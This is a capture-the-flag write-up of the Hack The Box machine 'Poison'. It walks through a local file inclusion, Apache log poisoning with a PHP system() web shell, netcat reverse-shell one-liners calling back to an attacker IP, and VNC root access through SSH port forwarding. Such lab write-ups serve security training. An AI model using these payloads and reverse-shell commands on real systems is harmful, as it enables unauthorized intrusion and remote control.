Recon
nmap x rustscan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
|
└─$ rustscan -a 10.10.10.84 -b 10000 -- -A -Pn -sV -T5
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFLpOCLU3rRUdNNbb5u5WlP+JKUpoYw4znHe0n4mRlv5sQ5kkkZSDNMqXtfWUFzevPaLaJboNBOAXjPwd1OV1wL2YFcGsTL5MOXgTeW4ixpxNBsnBj67mPSmQSaWcudPUmhqnT5VhKYLbPk43FsWqGkNhDtbuBVo9/BmN+GjN1v7w54PPtn8wDd7Zap3yStvwRxeq8E0nBE4odsfBhPPC01302RZzkiXymV73WqmI8MeF9W94giTBQS5swH6NgUe4/QV1tOjTct/uzidFx+8bbcwcQ1eUgK5DyRLaEhou7PRlZX6Pg5YgcuQUlYbGjgk6ycMJDuwb2D5mJkAzN4dih
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKXh613KF4mJTcOxbIy/3mN/O/wAYht2Vt4m9PUoQBBSao16RI9B3VYod1HSbx3PYsPpKmqjcT7A/fHggPIzDYU=
| 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJrg2EBbG5D2maVLhDME5mZwrvlhTXrK7jiEI+MiZ+Am
80/tcp open http syn-ack Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
|
We are face of a FreeBSD machine :/ We have two open ports ssh & http.
Browsing to http://10.10.10.84/
we are face into a “temporary website” where we can test some php scripts.
The website list some pages:
- ini.php
- info.php: leak the machine name and the version FreeBSD 11.1-RELEASE
- listfiles.php: leak a file pwdbackup.txt
- phpinfo.php: leak php informations (php v5.6.32)
The pwdbackup.txt
exposed a “secure” password that seems to be encoded with base64, 13 times according to the sentence.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
This password is secure, it's encoded atleast 13 times.. what could go wrong really..
Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU
bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS
bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW
M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs
WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy
eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G
WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw
MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa
T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k
WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk
WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0
NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT
Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz
WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW
VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO
Ukd4RVdub3dPVU5uUFQwSwo=
|
Passing the password into a b64 decoder, 13 times, we got the password Charix!2#4%6&8(0
.
I first try to connect into the box using those credentials charix:Charix!2#4%6&8(0
into ssh, guessing that the first word in the password is the user and…
1
2
3
4
5
|
Welcome to FreeBSD!
charix@Poison:~ % cat /home/charix/user.txt
**************************04209c
|
We got our first shell ! And the user flag :)
Path to the privesc
Local recon
In charix
home directory we found a zip archive named secret.zip
. It failed to decompress the file because it is password encrypted.
So I manage to do some bruteforce with john
.
1
2
3
4
|
# get hash from zip2john
└─$ zip2john secret.zip > hash.txt
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
|
But it failed.
The, I run a scan using LinEnum to try to find some interesting things. But I can’t find any usefull information (crontab, running process, etc).
Thinking about logs
The box name is Poison, so it made me think of a famous vulnerability named log poisoning. Log poisoning consist in injecting malicious code into log files.
I manage to search into the log directory. I found a log named httpd-access.log
. This, log all requests done to the webserver.
Indeed, we can find there our requests to http://10.10.10.84/browse.php
:
1
2
3
4
5
6
|
charix@Poison:/var/log % tail httpd-access.log
10.10.16.7 - - [30/Aug/2022:00:09:42 +0200] "GET /browse.php?file=ini.php HTTP/1.1" 200 20456 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.16.7 - - [30/Aug/2022:00:09:44 +0200] "GET /browse.php?file=info.php HTTP/1.1" 200 157 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.16.7 - - [30/Aug/2022:00:09:46 +0200] "GET /browse.php?file=listfiles.php HTTP/1.1" 200 192 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
10.10.16.7 - - [30/Aug/2022:00:10:11 +0200] "GET /browse.php?file=COUCOU HTTP/1.1" 200 357 "http://10.10.10.84/" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
|
Now that we know that everything is logged, we can try to do some log poisoning.
Thanks to this article, I learn how we can manipulate logs to execute commands.
To do so, we need to have an access to the log file throught LFI.I check if a LFI is possible by retrieving a file through the form: http://10.10.10.84/browse.php?file=..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fhttpd-access.log
We are able to get the httpd-access.log
file throught LFI.
Exploiting logs
With Burp, we intercept the webrequet to the log file (on http://10.10.10.84/browse.php?file=../../../../../var/log/httpd-access.log
) and we replace User-Agent field by the payload below.
1
|
<?php system($_GET['cmd']); ?>
|
Then, we send the request. Our payload is now on the log file. We can check that our payload is working by sending commands throught it.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
# sending a 'ls -al' command
└─$ curl "http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls%20-al"
10.10.16.7 - - [30/Aug/2022:01:08:51 +0200] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log HTTP/1.1" 200 879 "-" "total 72
drwxr-xr-x 2 root wheel 512 Mar 19 2018 .
drwxr-xr-x 6 root wheel 512 Jan 24 2018 ..
-rw-r--r-- 1 root wheel 33 Jan 24 2018 browse.php
-rw-r--r-- 1 root wheel 289 Jan 24 2018 index.php
-rw-r--r-- 1 root wheel 27 Jan 24 2018 info.php
-rw-r--r-- 1 root wheel 33 Jan 24 2018 ini.php
-rw-r--r-- 1 root wheel 90 Jan 24 2018 listfiles.php
-rw-r--r-- 1 root wheel 20 Jan 24 2018 phpinfo.php
-rw-r--r-- 1 root wheel 1267 Mar 19 2018 pwdbackup.txt
"
10.10.16.7 - - [30/Aug/2022:01:09:05 +0200] "GET /browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=ls%20-al HTTP/1.1" 200 1499 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
|
It works! Let’s try to get a reverse shell. The LinEnum scan found that netcat command is available.
1
2
3
4
5
6
|
# Listen on Host
└─$ rlwrap nc -lvnp 4444
# try to get reverse shell using 'nc' then '/dev/tcp'
# /usr/bin/nc 10.10.16.7 4444 -e sh
└─$ curl "http://10.10.10.84/browse.php?file=%2Fvar%2Flog%2Fhttpd-access.log&cmd=/usr/bin/nc%2010.10.16.7%204444%20-e%20sh"
|
Sadly,it does not work. The PentestMonkey Cheatsheet provide a second method that can give a reverse shell if the basic one does not work.
1
2
3
|
# alternative netcat reverse shell
#rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.7 4444 >/tmp/f
└─$ curl "http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.16.7%204444%20%3E/tmp/f"
|
And we got another shell with the www
user.
1
2
3
4
5
6
|
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.84] 17534
sh: can't access tty; job control turned off
whoami
www
|
At this point, I can’t find anything usefull with that user. But it was cool to apply this technique.
Go back in time
I decide to go back and spend more time on the secret.zip
archive found ealier. So I check if there are any active network connection.
I try a netstat -lnptu
but some option are not present on FreeBSD. A rapid search and we find the equivalent in FreeBSD.
1
2
3
4
5
6
7
8
9
10
|
# show listening connection
sockstat -l
charix@Poison:~ % sockstat -l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS
root sendmail 653 3 tcp4 127.0.0.1:25 *:*
root Xvnc 529 0 stream /tmp/.X11-unix/X1
root Xvnc 529 1 tcp4 127.0.0.1:5901 *:*
root Xvnc 529 3 tcp4 127.0.0.1:5801 *:*
|
We found two potentially interesting command that are listening, sendmail
& Xvnc
. I first search for Xvnc
vulnerabilities using searchsploit.
1
2
3
4
5
6
7
8
9
10
11
12
|
# checking version
charix@Poison:/tmp % Xvnc -version
Xvnc version TightVNC-1.3.10
└─$ searchsploit TightVNC
----------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------- ---------------------------------
TightVNC - Authentication Failure Integer Overflow (PoC) | windows/dos/8024.py
UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows | windows/dos/7990.py
----------------------------------------------------------------------- ---------------------------------
|
We found an Integer Overflow! Let’s try the exploit!
Exploit Xvnc service
Unfortunately I was not able to exploit this vulnerability. I manage to get an access in local to the VNC service.
To do so, as the vnc server is running locally on the box, we can use ssh to port forward the server on our machine using the -L option.
1
2
3
4
5
6
7
8
9
10
|
# From HOST
└─$ ssh -L 5901:localhost:5901 charix@10.10.10.84
# From HOST
└─$ vncviewer localhost:5901
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Password: Charix!2#4%6&8(0
Authentication failed
|
We now have an access to VNC, I try to use the password that we have but we got an “Authentication failed”.
And then… 🤦♂️🤦♂️🤦♂️
The password of the archive would not be that of the user charix ?
1
2
3
4
|
└─$ unzip secret.zip
Archive: secret.zip
[secret.zip] secret password: Charix!2#4%6&8(0
extracting: secret
|
Looking at the vncviewer
, I found that we can use a file to authenticate.
1
2
3
4
5
6
|
└─$ vncviewer localhost:5901 -passwd secret
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "root's X desktop (Poison:1)"
|
We get a root shell, we can get the flag :)
Log Poisoning, FreeBSD, Easy, External, Apache, Penetration Tester Level 1, Local File Inclusion, A08:2021-Software And Data Integrity Failures, Use Of Injection Attacks, VNC, Confidentiality, Weak Authentication, Network, Password Reuse, Tunneling, Port Forwarding